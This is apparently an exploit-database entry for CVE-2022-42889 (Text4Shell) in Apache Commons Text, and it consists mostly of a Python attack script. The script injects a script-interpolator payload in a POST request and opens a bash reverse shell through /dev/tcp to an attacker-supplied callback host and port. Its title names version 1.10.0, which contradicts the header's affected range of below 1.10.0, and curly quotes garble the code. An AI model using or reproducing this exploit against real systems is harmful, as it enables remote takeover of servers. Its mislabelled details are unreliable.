Apache Commons Text 1.10.0 – Remote Code Execution

• CVE-2022-42889

Exploit Title: Apache Commons Text 1.10.0 – Remote Code Execution (Text4Shell – POST-based) Date: 2025-04-17 Exploit Author: Arjun Chaudhary Vendor Homepage: https://commons.apache.org/proper/commons-text/ Software…

# Exploit Title: Apache Commons Text 1.10.0 – Remote Code Execution

(Text4Shell – POST-based)

# Date: 2025-04-17

# Exploit Author: Arjun Chaudhary

# Vendor Homepage: https://commons.apache.org/proper/commons-text/

# Software Link:https://repo1.maven.org/maven2/org/apache/commons/commons-text/

# Version: Apache Commons Text < 1.10.0
# Tested on: Ubuntu 20.04 (Docker container), Java 11+, Apache Commons Text 1.9

# CVE: CVE-2022-42889

# Type: Remote Code Execution (RCE)

# Method: POST request, script interpolator

# Notes: This exploit demonstrates an RCE vector via POST data, differing

from common GET-based payloads.

#!/usr/bin/env python3

import urllib.parse

import http.client

import sys

def usage():

print(“Usage: python3 text4shell.py “)

print(“Example: python3 text4shell.py 127.0.0.1 192.168.22.128 4444”)

sys.exit(1)

if len(sys.argv) != 4:

usage()

target_ip = sys.argv[1]

callback_ip = sys.argv[2]

callback_port = sys.argv[3]

raw_payload = (

f”${{script:javascript:var p=java.lang.Runtime.getRuntime().exec(”

f”[‘bash’,’-c’,’bash -c \\’exec bash -i >& /dev/tcp/{callback_ip}/{callback_port} 0>&1\\”])}}”

)

encoded_payload = urllib.parse.quote(raw_payload)

path = f”/?data={encoded_payload}” # modify the parameter according to your target

print(f”[!] Remember to modify the parameter according to your target”)

print(f”[+] Target: http://{target_ip}{path}”)

print(f”[+] Payload (decoded): {raw_payload}”)

conn = http.client.HTTPConnection(target_ip, 80)

conn.request(“POST”, path, body=””, headers={

“Host”: target_ip,

“Content-Type”: “application/json”,

“Content-Length”: “0”

})

response = conn.getresponse()

print(f”[+] Response Status: {response.status}”)

print(response.read().decode())

conn.close()